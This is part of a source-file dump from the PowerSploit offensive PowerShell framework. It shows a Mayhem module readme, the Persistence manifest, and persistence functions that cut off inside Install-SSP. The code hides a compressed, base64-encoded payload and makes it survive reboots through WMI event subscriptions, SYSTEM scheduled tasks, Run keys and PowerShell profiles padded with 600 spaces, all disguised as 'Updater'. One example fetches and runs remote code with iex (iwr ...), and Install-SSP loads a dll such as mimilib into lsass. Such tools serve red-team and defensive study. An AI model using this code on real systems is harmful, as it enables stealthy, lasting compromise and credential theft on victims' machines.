    "content": "To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.\n\nThe default per-user module path is: \"$Env:HomeDrive$Env:HOMEPATH\\Documents\\WindowsPowerShell\\Modules\"\nThe default computer-level module path is: \"$Env:windir\\System32\\WindowsPowerShell\\v1.0\\Modules\"\n\nTo use the module, type `Import-Module Mayhem`\n\nTo see the commands imported, type `Get-Command -Module Mayhem`\n\nFor help on each individual command, Get-Help is your friend.\n\nNote: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability."
  },
  {
    "path": "Persistence/Persistence.psd1",
    "content": "@{\n\n# Script module or binary module file associated with this manifest.\nModuleToProcess = 'Persistence.psm1'\n\n# Version number of this module.\nModuleVersion = '3.0.0.0'\n\n# ID used to uniquely identify this module\nGUID = '633d0f10-a056-41da-869d-6d2f75430195'\n\n# Author of this module\nAuthor = 'Matthew Graeber'\n\n# Copyright statement for this module\nCopyright = 'BSD 3-Clause'\n\n# Description of the functionality provided by this module\nDescription = 'PowerSploit Persistence Module'\n\n# Minimum version of the Windows PowerShell engine required by this module\nPowerShellVersion = '2.0'\n\n# Functions to export from this module\nFunctionsToExport = '*'\n\n# List of all files packaged with this module\nFileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md'\n\n}\n"
  },
  {
    "path": "Persistence/Persistence.psm1",
    "content": "function New-ElevatedPersistenceOption\n{\n<#\n.SYNOPSIS\n\nConfigure elevated persistence options for the Add-Persistence function.\n\nPowerSploit Function: New-ElevatedPersistenceOption  \nAuthor: Matthew Graeber (@mattifestation)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nNew-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.\n\n.PARAMETER PermanentWMI\n\nPersist via a permanent WMI event subscription. This option will be the most difficult to detect and remove.\n\nDetection Difficulty:        Difficult\nRemoval Difficulty:          Difficult\nUser Detectable?             No\n\n.PARAMETER ScheduledTask\n\nPersist via a scheduled task.\n\nDetection Difficulty:        Moderate\nRemoval Difficulty:          Moderate\nUser Detectable?             No\n\n.PARAMETER Registry\n\nPersist via the HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry key. Note: This option will briefly pop up a PowerShell console to the user.\n\nDetection Difficulty:        Easy\nRemoval Difficulty:          Easy\nUser Detectable?             Yes\n\n.PARAMETER AtLogon\n\nStarts the payload upon any user logon.\n\n.PARAMETER AtStartup\n\nStarts the payload within 240 and 325 seconds of computer startup.\n\n.PARAMETER OnIdle\n\nStarts the payload after one minute of idling.\n\n.PARAMETER Daily\n\nStarts the payload daily.\n\n.PARAMETER Hourly\n\nStarts the payload hourly.\n\n.PARAMETER At\n\nStarts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.\n\n.EXAMPLE\n\n$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'\n\n.EXAMPLE\n\n$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup\n\n.EXAMPLE\n\n$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle\n\n.LINK\n\nhttp://www.exploit-monday.com\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [CmdletBinding()]\n    Param (\n        [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]\n        [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]\n        [Switch]\n        $PermanentWMI,\n\n        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]\n        [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]\n        [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]\n        [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]\n        [Switch]\n        $ScheduledTask,\n\n        [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]\n        [Switch]\n        $Registry,\n\n        [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]\n        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]\n        [Switch]\n        $Daily,\n\n        [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]\n        [Switch]\n        $Hourly,\n\n        [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]\n        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]\n        [DateTime]\n        $At,\n\n        [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]\n        [Switch]\n        $OnIdle,\n\n        [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]\n        [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]\n        [Switch]\n        $AtLogon,\n\n        [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]\n        [Switch]\n        $AtStartup\n    )\n\n    $PersistenceOptionsTable = @{\n        Method = ''\n        Trigger = ''\n        Time = ''\n    }\n\n    switch ($PSCmdlet.ParameterSetName)\n    {\n        'PermanentWMIAtStartup'\n        {\n            $PersistenceOptionsTable['Method'] = 'PermanentWMI'\n            $PersistenceOptionsTable['Trigger'] = 'AtStartup'\n        }\n\n        'PermanentWMIDaily'\n        {\n            $PersistenceOptionsTable['Method'] = 'PermanentWMI'\n            $PersistenceOptionsTable['Trigger'] = 'Daily'\n            $PersistenceOptionsTable['Time'] = $At\n        }\n\n        'ScheduledTaskAtLogon'\n        {\n            $PersistenceOptionsTable['Method'] = 'ScheduledTask'\n            $PersistenceOptionsTable['Trigger'] = 'AtLogon'\n        }\n\n        'ScheduledTaskOnIdle'\n        {\n            $PersistenceOptionsTable['Method'] = 'ScheduledTask'\n            $PersistenceOptionsTable['Trigger'] = 'OnIdle'\n        }\n\n        'ScheduledTaskDaily'\n        {\n            $PersistenceOptionsTable['Method'] = 'ScheduledTask'\n            $PersistenceOptionsTable['Trigger'] = 'Daily'\n            $PersistenceOptionsTable['Time'] = $At\n        }\n\n        'ScheduledTaskHourly'\n        {\n            $PersistenceOptionsTable['Method'] = 'ScheduledTask'\n            $PersistenceOptionsTable['Trigger'] = 'Hourly'\n        }\n\n        'Registry'\n        {\n            $PersistenceOptionsTable['Method'] = 'Registry'\n            $PersistenceOptionsTable['Trigger'] = 'AtLogon'\n        }\n    }\n\n    $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable\n    $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOption'\n\n    Write-Output $PersistenceOptions\n}\n\nfunction New-UserPersistenceOption\n{\n<#\n.SYNOPSIS\n\nConfigure user-level persistence options for the Add-Persistence function.\n\nPowerSploit Function: New-UserPersistenceOption  \nAuthor: Matthew Graeber (@mattifestation)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nNew-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry.\n\n.PARAMETER ScheduledTask\n\nPersist via a scheduled task.\n\nDetection Difficulty:        Moderate\nRemoval Difficulty:          Moderate\nUser Detectable?             No\n\n.PARAMETER Registry\n\nPersist via the HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry key. Note: This option will briefly pop up a PowerShell console to the user.\n\nDetection Difficulty:        Easy\nRemoval Difficulty:          Easy\nUser Detectable?             Yes\n\n.PARAMETER AtLogon\n\nStarts the payload upon any user logon.\n\n.PARAMETER OnIdle\n\nStarts the payload after one minute of idling.\n\n.PARAMETER Daily\n\nStarts the payload daily.\n\n.PARAMETER Hourly\n\nStarts the payload hourly.\n\n.PARAMETER At\n\nStarts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.\n\n.EXAMPLE\n\n$UserOptions = New-UserPersistenceOption -Registry -AtLogon\n\n.EXAMPLE\n\n$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle\n\n.LINK\n\nhttp://www.exploit-monday.com\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [CmdletBinding()]\n    Param (\n        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]\n        [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]\n        [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]\n        [Switch]\n        $ScheduledTask,\n\n        [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]\n        [Switch]\n        $Registry,\n\n        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]\n        [Switch]\n        $Daily,\n\n        [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]\n        [Switch]\n        $Hourly,\n\n        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]\n        [DateTime]\n        $At,\n\n        [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]\n        [Switch]\n        $OnIdle,\n\n        [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]\n        [Switch]\n        $AtLogon\n    )\n\n    $PersistenceOptionsTable = @{\n        Method = ''\n        Trigger = ''\n        Time = ''\n    }\n\n    switch ($PSCmdlet.ParameterSetName)\n    {\n        'ScheduledTaskAtLogon'\n        {\n            $PersistenceOptionsTable['Method'] = 'ScheduledTask'\n            $PersistenceOptionsTable['Trigger'] = 'AtLogon'\n        }\n\n        'ScheduledTaskOnIdle'\n        {\n            $PersistenceOptionsTable['Method'] = 'ScheduledTask'\n            $PersistenceOptionsTable['Trigger'] = 'OnIdle'\n        }\n\n        'ScheduledTaskDaily'\n        {\n            $PersistenceOptionsTable['Method'] = 'ScheduledTask'\n            $PersistenceOptionsTable['Trigger'] = 'Daily'\n            $PersistenceOptionsTable['Time'] = $At\n        }\n\n        'ScheduledTaskHourly'\n        {\n            $PersistenceOptionsTable['Method'] = 'ScheduledTask'\n            $PersistenceOptionsTable['Trigger'] = 'Hourly'\n        }\n\n        'Registry'\n        {\n            $PersistenceOptionsTable['Method'] = 'Registry'\n            $PersistenceOptionsTable['Trigger'] = 'AtLogon'\n        }\n    }\n\n    $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable\n    $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOption'\n\n    Write-Output $PersistenceOptions\n}\n\nfunction Add-Persistence\n{\n<#\n.SYNOPSIS\n\nAdd persistence capabilities to a script.\n\nPowerSploit Function: Add-Persistence  \nAuthor: Matthew Graeber (@mattifestation)  \nLicense: BSD 3-Clause  \nRequired Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nAdd-Persistence will add persistence capabilities to any script or scriptblock. This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted.\n\n.PARAMETER ScriptBlock\n\nSpecifies a scriptblock containing your payload.\n\n.PARAMETER FilePath\n\nSpecifies the path to your payload.\n\n.PARAMETER ElevatedPersistenceOption\n\nSpecifies the trigger for the persistent payload if the target is running elevated.\nYou must run New-ElevatedPersistenceOption to generate this argument.\n\n.PARAMETER UserPersistenceOption\n\nSpecifies the trigger for the persistent payload if the target is not running elevated.\nYou must run New-UserPersistenceOption to generate this argument.\n\n.PARAMETER PersistenceScriptName\n\nSpecifies the name of the function that will wrap the original payload. The default value is 'Update-Windows'.\n\n.PARAMETER DoNotPersistImmediately\n\nOutput only the wrapper function for the original payload. By default, Add-Persistence will output a script that will automatically attempt to persist (e.g. it will end with 'Update-Windows -Persist'). If you are in a position where you are running in memory but want to persist at a later time, use this option.\n\n.PARAMETER PersistentScriptFilePath\n\nSpecifies the path where you would like to output the persistence script. By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory.\n\n.PARAMETER RemovalScriptFilePath\n\nSpecifies the path where you would like to output a script that will remove the persistent payload. By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory.\n\n.PARAMETER PassThru\n\nOutputs the contents of the persistent script to the pipeline. This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline.\n\n.INPUTS\n\nNone\n\nAdd-Persistence cannot receive any input from the pipeline.\n\n.OUTPUTS\n\nSystem.Management.Automation.ScriptBlock\n\nIf the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script.\n\n.NOTES\n\nWhen the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine.\n\n.EXAMPLE\n\n$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'\n$UserOptions = New-UserPersistenceOption -Registry -AtLogon\nAdd-Persistence -FilePath .\\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose\n\nDescription\n-----------\nCreates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime.\n\n.EXAMPLE\n\n$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }\n$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle\n$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle\nAdd-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\\EncodedPersistentScript.ps1\n\nDescription\n-----------\nCreates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement. The final, encoded output is finally saved to .\\EncodedPersistentScript.ps1\n\n.LINK\n\nhttp://www.exploit-monday.com\n#>\n    \n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingCmdletAliases', '')]\n    [CmdletBinding()]\n    Param (\n        [Parameter( Mandatory = $True, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )]\n        [ValidateNotNullOrEmpty()]\n        [ScriptBlock]\n        $ScriptBlock,\n\n        [Parameter( Mandatory = $True, ParameterSetName = 'FilePath' )]\n        [ValidateNotNullOrEmpty()]\n        [Alias('Path')]\n        [String]\n        $FilePath,\n\n        [Parameter( Mandatory = $True )]\n        $ElevatedPersistenceOption,\n\n        [Parameter( Mandatory = $True )]\n        $UserPersistenceOption,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $PersistenceScriptName = 'Update-Windows',\n\n        [String]\n        $PersistentScriptFilePath = \"$PWD\\Persistence.ps1\",\n\n        [String]\n        $RemovalScriptFilePath = \"$PWD\\RemovePersistence.ps1\",\n\n        [Switch]\n        $DoNotPersistImmediately,\n\n        [Switch]\n        $PassThru\n    )\n\n    Set-StrictMode -Version 2\n\n#region Validate arguments\n\n    if ($ElevatedPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.ElevatedPersistenceOption')\n    {\n        throw 'You provided invalid elevated persistence options.'\n    }\n\n    if ($UserPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.UserPersistenceOption')\n    {\n        throw 'You provided invalid user-level persistence options.'\n    }\n\n    $Result = Get-Item $PersistentScriptFilePath -ErrorAction SilentlyContinue\n    if ($Result -and $Result.PSIsContainer)\n    {\n        throw 'You must provide a file name with the PersistentScriptFilePath option.'\n    }\n\n    $Result = Get-Item $RemovalScriptFilePath -ErrorAction SilentlyContinue\n    if ($Result -and $Result.PSIsContainer)\n    {\n        throw 'You must provide a file name with the RemovalScriptFilePath option.'\n    }\n\n    $PersistentPath = Split-Path $PersistentScriptFilePath -ErrorAction Stop\n    $Leaf = Split-Path $PersistentScriptFilePath -Leaf -ErrorAction Stop\n    $PersistentScriptFile = ''\n    $RemovalScriptFile = ''\n\n    if ($PersistentPath -eq '')\n    {\n        # i.e. Only a file name was provided implying $PWD\n        $PersistentScriptFile = \"$($PWD)\\$($Leaf)\"\n    }\n    else\n    {\n        $PersistentScriptFile = \"$(Resolve-Path $PersistentPath)\\$($Leaf)\"\n    }\n\n    $RemovalPath = Split-Path $RemovalScriptFilePath -ErrorAction Stop\n    $Leaf = Split-Path $RemovalScriptFilePath -Leaf -ErrorAction Stop\n    if ($RemovalPath -eq '')\n    {\n        # i.e. Only a file name was provided implying $PWD\n        $RemovalScriptFile = \"$($PWD)\\$($Leaf)\"\n    }\n    else\n    {\n        $RemovalScriptFile = \"$(Resolve-Path $RemovalPath)\\$($Leaf)\"\n    }\n\n    if ($PSBoundParameters['FilePath'])\n    {\n        $null = Get-ChildItem $FilePath -ErrorAction Stop\n        $Script = [IO.File]::ReadAllText((Resolve-Path $FilePath))\n    }\n    else\n    {\n        $Script = $ScriptBlock\n    }\n\n#endregion\n\n#region Initialize data\n\n    $UserTrigger = ''\n    $UserTriggerRemoval = ''\n    $ElevatedTrigger = \"''\"\n    $ElevatedTriggerRemoval = ''\n    $UserTrigger = \"''\"\n    $UserTriggerRemoval = ''\n    $CommandLine = ''\n\n#endregion\n\n#region Compress the original payload in preparation for the persistence script\n\n    $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($Script)\n    $CompressedStream = New-Object IO.MemoryStream\n    $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)\n    $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)\n    $DeflateStream.Dispose()\n    $CompressedScriptBytes = $CompressedStream.ToArray()\n    $CompressedStream.Dispose()\n    $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)\n\n    # Generate the code that will decompress and execute the payload.\n    # This code is intentionally ugly to save space.\n    $NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + \"'$EncodedCompressedScript'\" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'\n\n#endregion\n\n#region Process persistence options\n\n    # Begin processing elevated persistence options\n    switch ($ElevatedPersistenceOption.Method)\n    {\n        'PermanentWMI'\n        {\n            $ElevatedTriggerRemoval = {\nGet-WmiObject __eventFilter -namespace root\\subscription -filter \"name='Updater'\"| Remove-WmiObject\nGet-WmiObject CommandLineEventConsumer -Namespace root\\subscription -filter \"name='Updater'\" | Remove-WmiObject\nGet-WmiObject __FilterToConsumerBinding -Namespace root\\subscription | Where-Object { $_.filter -match 'Updater'} | Remove-WmiObject\n            }\n\n            switch ($ElevatedPersistenceOption.Trigger)\n            {\n                'AtStartup'\n                {\n                    $ElevatedTrigger = \"`\"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```\"root\\subscription```\" -Arguments @{name='Updater';EventNameSpace='root\\CimV2';QueryLanguage=```\"WQL```\";Query=```\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325```\"};```$Consumer=Set-WmiInstance -Namespace ```\"root\\subscription```\" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```\"```$(```$Env:SystemRoot)\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonInteractive```\";RunInteractively='false'};Set-WmiInstance -Namespace ```\"root\\subscription```\" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`\"\"\n                }\n\n                'Daily'\n                {\n                    $ElevatedTrigger = \"`\"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```\"root\\subscription```\" -Arguments @{name='Updater';EventNameSpace='root\\CimV2';QueryLanguage=```\"WQL```\";Query=```\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ElevatedPersistenceOption.Time.ToString('HH')) AND TargetInstance.Minute = $($ElevatedPersistenceOption.Time.ToString('mm')) GROUP WITHIN 60```\"};```$Consumer=Set-WmiInstance -Namespace ```\"root\\subscription```\" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```\"```$(```$Env:SystemRoot)\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonInteractive```\";RunInteractively='false'};Set-WmiInstance -Namespace ```\"root\\subscription```\" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`\"\"\n                }\n\n                default\n                {\n                    throw 'Invalid elevated persistence options provided!'\n                }\n            }\n        }\n\n        'ScheduledTask'\n        {\n            $CommandLine = '`\"$($Env:SystemRoot)\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonInteractive`\"'\n            $ElevatedTriggerRemoval = \"schtasks /Delete /TN Updater\"\n\n            switch ($ElevatedPersistenceOption.Trigger)\n            {\n                'AtLogon'\n                {\n                    $ElevatedTrigger = \"schtasks /Create /RU system /SC ONLOGON /TN Updater /TR \"\n                }\n\n                'Daily'\n                {\n                    $ElevatedTrigger = \"schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR \"\n                }\n\n                'Hourly'\n                {\n                    $ElevatedTrigger = \"schtasks /Create /RU system /SC HOURLY /TN Updater /TR \"\n                }\n\n                'OnIdle'\n                {\n                    $ElevatedTrigger = \"schtasks /Create /RU system /SC ONIDLE /I 1 /TN Updater /TR \"\n                }\n\n                default\n                {\n                    throw 'Invalid elevated persistence options provided!'\n                }\n            }\n\n            $ElevatedTrigger = '\"' + $ElevatedTrigger + $CommandLine + '\"'\n        }\n\n        'Registry'\n        {\n            $ElevatedTrigger = \"New-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name Updater -PropertyType String -Value \"\n            $ElevatedTriggerRemoval = \"Remove-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name Updater\"\n            $CommandLine = \"`\"```\"`$(`$Env:SystemRoot)\\System32\\WindowsPowerShell\\v1.0\\powershell.exe```\" -NonInteractive -WindowStyle Hidden`\"\"\n            $ElevatedTrigger = \"'\" + $ElevatedTrigger + $CommandLine + \"'\"\n        }\n\n        default\n        {\n            throw 'Invalid elevated persistence options provided!'\n        }\n    }\n\n    # Begin processing user-level persistence options\n    switch ($UserPersistenceOption.Method)\n    {\n        'ScheduledTask'\n        {\n            $CommandLine = '`\"$($Env:SystemRoot)\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonInteractive`\"'\n            $UserTriggerRemoval = \"schtasks /Delete /TN Updater\"\n\n            switch ($UserPersistenceOption.Trigger)\n            {\n                'Daily'\n                {\n                    $UserTrigger = \"schtasks /Create /SC DAILY /ST $($UserPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR \"\n                }\n\n                'Hourly'\n                {\n                    $UserTrigger = \"schtasks /Create /SC HOURLY /TN Updater /TR \"\n                }\n\n                'OnIdle'\n                {\n                    $UserTrigger = \"schtasks /Create /SC ONIDLE /I 1 /TN Updater /TR \"\n                }\n\n                default\n                {\n                    throw 'Invalid user-level persistence options provided!'\n                }\n            }\n\n            $UserTrigger = '\"' + $UserTrigger + $CommandLine + '\"'\n        }\n\n        'Registry'\n        {\n            $UserTrigger = \"New-ItemProperty -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name Updater -PropertyType String -Value \"\n            $UserTriggerRemoval = \"Remove-ItemProperty -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name Updater\"\n            $CommandLine = \"`\"```\"`$(`$Env:SystemRoot)\\System32\\WindowsPowerShell\\v1.0\\powershell.exe```\" -NonInteractive -WindowStyle Hidden`\"\"\n            $UserTrigger = \"'\" + $UserTrigger + $CommandLine + \"'\"\n        }\n\n        default\n        {\n            throw 'Invalid user-level persistence options provided!'\n        }\n    }\n\n#endregion\n\n#region Original script with its persistence logic will reside here\n\n# This is intentionally ugly in the interest of saving space on the victim machine.\n$PersistantScript = {\nfunction FUNCTIONNAME{\nParam([Switch]$Persist)\n$ErrorActionPreference='SilentlyContinue'\n$Script={ORIGINALSCRIPT}\nif($Persist){\nif(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))\n{$Prof=$PROFILE.AllUsersAllHosts;$Payload=ELEVATEDTRIGGER}\nelse\n{$Prof=$PROFILE.CurrentUserAllHosts;$Payload=USERTRIGGER}\nmkdir (Split-Path -Parent $Prof)\n(gc $Prof) + (' ' * 600 + $Script)|Out-File $Prof -Fo\niex $Payload|Out-Null\nWrite-Output $Payload}\nelse\n{$Script.Invoke()}\n} EXECUTEFUNCTION\n\n}\n\n    $PersistantScript = $PersistantScript.ToString().Replace('FUNCTIONNAME', $PersistenceScriptName)\n    $PersistantScript = $PersistantScript.ToString().Replace('ORIGINALSCRIPT', $NewScript)\n    $PersistantScript = $PersistantScript.ToString().Replace('ELEVATEDTRIGGER', $ElevatedTrigger)\n    $PersistantScript = $PersistantScript.ToString().Replace('USERTRIGGER', $UserTrigger)\n\n    if ($DoNotPersistImmediately)\n    {\n        $PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', '')\n    }\n    else\n    {\n        $PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', \"$PersistenceScriptName -Persist\")\n    }\n\n#endregion\n\n#region Generate final output\n\n# Generate the persistence removal script\n$PersistenceRemoval = @\"\n# Execute the following to remove the elevated persistent payload\n$ElevatedTriggerRemoval\n(gc `$PROFILE.AllUsersAllHosts) -replace '[\\s]{600}.+',''| Out-File `$PROFILE.AllUsersAllHosts -Fo\n# Execute the following to remove the user-level persistent payload\n$UserTriggerRemoval\n(gc `$PROFILE.CurrentUserAllHosts) -replace '[\\s]{600}.+',''| Out-File `$PROFILE.CurrentUserAllHosts -Fo\n\"@\n\n\n    $PersistantScript | Out-File $PersistentScriptFile\n    Write-Verbose \"Persistence script written to $PersistentScriptFile\"\n\n    $PersistenceRemoval | Out-File $RemovalScriptFile\n    Write-Verbose \"Persistence removal script written to $RemovalScriptFile\"\n\n    if ($PassThru)\n    {\n        # Output a scriptblock of the persistent function. This can be passed to Out-EncodedCommand via the pipeline.\n        Write-Output ([ScriptBlock]::Create($PersistantScript))\n    }\n\n#endregion\n}\n\nfunction Install-SSP\n{\n<#\n.SYNOPSIS\n\nInstalls a security support provider (SSP) dll.\n\nAuthor: Matthew Graeber (@mattifestation)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nInstall-SSP installs an SSP dll. Installation involves copying the dll to\n%windir%\\System32 and adding the name of the dll to\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages.\n\n.PARAMETER Remove\n\nSpecifies the path to the SSP dll you would like to install.\n\n.EXAMPLE\n\nInstall-SSP -Path .\\mimilib.dll\n\n.NOTES\n\nThe SSP dll must match the OS architecture. i.e. You must have a 64-bit SSP dll\nif you are running a 64-bit OS. In order for the SSP dll to be loaded properly\ninto lsass, the dll must export SpLsaModeInitialize.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingCmdletAliases', '')]\n    [CmdletBinding()]\n    Param (\n        [ValidateScript({Test-Path (Resolve-Path $_)})]\n        [String]\n        $Path\n    )\n\n    $Principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()\n\n    if(-not $Principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))\n    {\n        throw 'Installing an SSP dll requires administrative rights. Execute this script from an elevated PowerShell prompt.'\n    }\n\n    # Resolve the full path if a relative path was provided.\n    $FullDllPath = Resolve-Path $Path\n\n    # Helper function used to determine the dll architecture\n    function local:Get-PEArchitecture\n    {\n        Param\n        (\n            [Parameter( Position = 0,\n                        Mandatory = $True )]\n            [String]\n            $Path\n        )\n\n        # Parse PE header to see if binary was compiled 32 or 64-bit\n        $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read)\n\n        [Byte[]] $MZHeader = New-Object Byte[](2)\n        $FileStream.Read($MZHeader,0,2) | Out-Null\n\n        $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)\n        if ($Header -ne 'MZ')\n        {\n            $FileStream.Close()\n            Throw 'Invalid PE header.'\n        }\n\n        # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header)\n        $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null\n\n        